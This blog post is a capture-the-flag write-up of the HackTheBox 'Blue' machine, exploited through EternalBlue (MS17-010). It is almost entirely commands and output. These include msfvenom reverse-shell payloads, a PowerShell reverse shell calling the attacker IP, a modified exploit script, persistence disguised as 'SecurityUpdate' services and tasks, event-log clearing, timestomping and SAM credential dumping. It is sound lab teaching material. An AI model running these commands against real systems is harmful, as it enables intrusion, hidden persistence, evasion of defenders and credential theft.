Post

HackTheBox Blue

Writeup for HackTheBox Blue

Posted Updated
By Edwin Tok
7 min read
HackTheBox Blue

Machine Synopsis

Key Exploitation Techniques:

  • SMB vulnerability scanning (MS17-010 / EternalBlue)
  • Remote code execution via SMBv1 vulnerability (CVE-2017-0143)
  • Direct SYSTEM shell acquisition through kernel exploitation
  • Windows post-exploitation techniques

Reconnaissance & Enumeration

Port Discovery

1
2
3
4
5
6
7
8
9
10
11
12

$ nmap -sC -sV -A 10.10.10.40
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

SMB Vulnerability Assessment

1
2
3
4
5
6
7
8
9
10

# SMB vulnerability scanning
$ nmap --script=vuln 10.10.10.40
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).

Critical Finding: Target is vulnerable to MS17-010 (EternalBlue).

SMB Enumeration

1
2
3
4
5
6
7

# Basic SMB enumeration
$ enum4linux -a 10.10.10.40
guest account is enabled.

# SMB version detection
$ smbclient -L 10.10.10.40
Anonymous login successful

Exploitation

EternalBlue Exploit Selection

1
2
3
4

# Search for MS17-010 exploits
$ searchsploit --id ms17-010
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)    | 42031
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Exe | 42315

Exploit Preparation

1
2
3
4
5
6

# Download EternalBlue exploit
$ searchsploit -m 42315
$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py

# Download required mysmb.py dependency
$ wget https://raw.githubusercontent.com/offensive-security/exploitdb/master/exploits/windows/remote/mysmb.py

Payload Creation

1
2
3
4
5
6
7
8

# Create Windows reverse shell payload
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1234 -f exe -o exploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: exploit.exe

Exploit Modification

1
2
3
4
5
6
7
8
9
10
11

# Modify 42315.py exploit script
# Set credentials for guest account
USERNAME = 'guest'
PASSWORD = ''

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    
    print('creating file c:\\exploit.exe on the target')
    smb_send_file(smbConn, '/home/user/HackTheBox/Blue/exploit.exe', 'C', '/exploit.exe')
    service_exec(conn, r'cmd /c c:\exploit.exe')

Exploitation Execution

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

# Setup netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...

# Execute EternalBlue exploit
$ python 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
...
Opening SVCManager on 10.10.10.40.....
Creating service cFsa.....
Starting service cFsa.....
The NETBIOS connection with the remote host timed out.
Removing service cFsa.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done

SYSTEM Shell Access

1
2
3
4
5
6
7
8
9
10

# Reverse shell connection received
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.40] 49161
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
haris-PC

Flag Retrieval

C:\Windows\system32>cd "C:\Users\haris\Desktop"
C:\Users\haris\Desktop>type user.txt
4c546aea7dbee75cbd71de245c8deea9

C:\Users\haris\Desktop>cd "C:\Users\Administrator\Desktop"
C:\Users\Administrator\Desktop>type root.txt
ff548eb71e920ff6c08843ce9df4e717

Post-Exploitation Techniques

Persistence Methods

Registry Persistence

1
2
3
4
5
6
7
8
9
10
11
12
13
14

# Create backdoor payload
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o backdoor.exe

# Setup HTTP server for file transfer
$ python3 -m http.server 80
# Download backdoor on target
C:\Windows\system32>powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.8/backdoor.exe','C:\Windows\System32\backdoor.exe')"

# Add registry auto-start entry
C:\Windows\system32>reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\System32\backdoor.exe"
The operation completed successfully.

# Verify persistence
C:\Windows\system32>reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate"

Service Installation

# Create persistent Windows service
C:\Windows\system32>sc create "WindowsUpdateService" binpath= "C:\Windows\System32\backdoor.exe" start= auto
[SC] CreateService SUCCESS

C:\Windows\system32>sc start "WindowsUpdateService"
[SC] StartService SUCCESS

C:\Windows\system32>sc query "WindowsUpdateService"
# Setup Metasploit handler for backdoor connections
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.8
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

Scheduled Task

# Create system startup task
C:\Windows\system32>schtasks /create /tn "SecurityUpdate" /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru SYSTEM
SUCCESS: The scheduled task "SecurityUpdate" has successfully been created.

C:\Windows\system32>schtasks /query /tn "SecurityUpdate"

# Test task execution
C:\Windows\system32>schtasks /run /tn "SecurityUpdate"

Defense Evasion

Event Log Clearing

# Clear Windows Event Logs
C:\Windows\system32>for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

# Clear specific security logs
C:\Windows\system32>wevtutil cl Security
C:\Windows\system32>wevtutil cl System
C:\Windows\system32>wevtutil cl Application

File Attribute Manipulation

# Hide backdoor files
C:\Windows\system32>attrib +h +s C:\Windows\System32\backdoor.exe

# Timestomp files to match system files
C:\Windows\system32>powershell "(Get-Item C:\Windows\System32\backdoor.exe).LastWriteTime = (Get-Item C:\Windows\System32\kernel32.dll).LastWriteTime"
C:\Windows\system32>powershell "(Get-Item C:\Windows\System32\backdoor.exe).CreationTime = (Get-Item C:\Windows\System32\kernel32.dll).CreationTime"

Process Hiding

# Run backdoor as legitimate Windows process
C:\Windows\system32>copy backdoor.exe svchost.exe
C:\Windows\system32>start svchost.exe

Lateral Movement Preparation

Network Discovery

# Discover network hosts
C:\Windows\system32>for /L %i in (1,1,254) do @ping -n 1 -w 100 10.10.10.%i | findstr "Reply"

# ARP table enumeration
C:\Windows\system32>arp -a

# Network shares discovery
C:\Windows\system32>net view /domain

Credential Harvesting

# Dump SAM database
C:\Windows\system32>reg save HKLM\SAM C:\Windows\Temp\sam
C:\Windows\system32>reg save HKLM\SYSTEM C:\Windows\Temp\system
C:\Windows\system32>reg save HKLM\SECURITY C:\Windows\Temp\security

# Search for stored credentials
C:\Windows\system32>cmdkey /list

# Search for password files
C:\Windows\system32>dir /s /b C:\ | findstr /i password
C:\Windows\system32>dir /s /b C:\ | findstr /i credential

Privilege Verification

# Check current privileges
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeCreateTokenPrivilege       Create a token object                     Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeLockMemoryPrivilege         Lock pages in memory                      Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process       Disabled
...

# Check group memberships
C:\Windows\system32>whoami /groups

System Information Gathering

# System information
C:\Windows\system32>systeminfo
Host Name:                 HARIS-PC
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                          [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,509 MB

# Network configuration
C:\Windows\system32>ipconfig /all

# Running processes
C:\Windows\system32>tasklist /v

# Installed software
C:\Windows\system32>wmic product get name,version

Alternative Exploitation Methods

Manual EternalBlue Exploitation

1
2
3
4
5
6
7
8

# Alternative exploit frameworks
$ git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
$ cd AutoBlue-MS17-010
$ pip install impacket

# Generate shellcode
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -f python
$ python eternalblue_exploit7.py 10.10.10.40 shellcode

Metasploit EternalBlue

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

# Using Metasploit framework
$ msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.8
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010!
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.40:49158)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

PowerShell Reverse Shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

# Create PowerShell reverse shell
$ cat > shell.ps1 << 'EOF'
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.8',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
};
$client.Close()
EOF

# Execute via EternalBlue
# Modify exploit to execute: powershell -ExecutionPolicy Bypass -File C:\shell.ps1

Alternative Payloads

Meterpreter Reverse TCP

1
2
3
4
5
6
7
8
9

# Generate meterpreter payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=443 -f exe -o meterpreter.exe

# Setup multi/handler
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.8
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > exploit

Bind Shell

1
2
3
4
5

# Generate bind shell payload
$ msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe -o bind.exe

# Connect to bind shell
$ nc 10.10.10.40 4444

SMB Relay Attacks

1
2
3
4
5

# Setup SMB relay (if multiple targets available)
$ python ntlmrelayx.py -t smb://10.10.10.40 -smb2support

# Capture NetNTLM hashes
$ responder -I tun0 -w -d
HackTheBox
windows
This post is licensed under CC BY 4.0 by the author.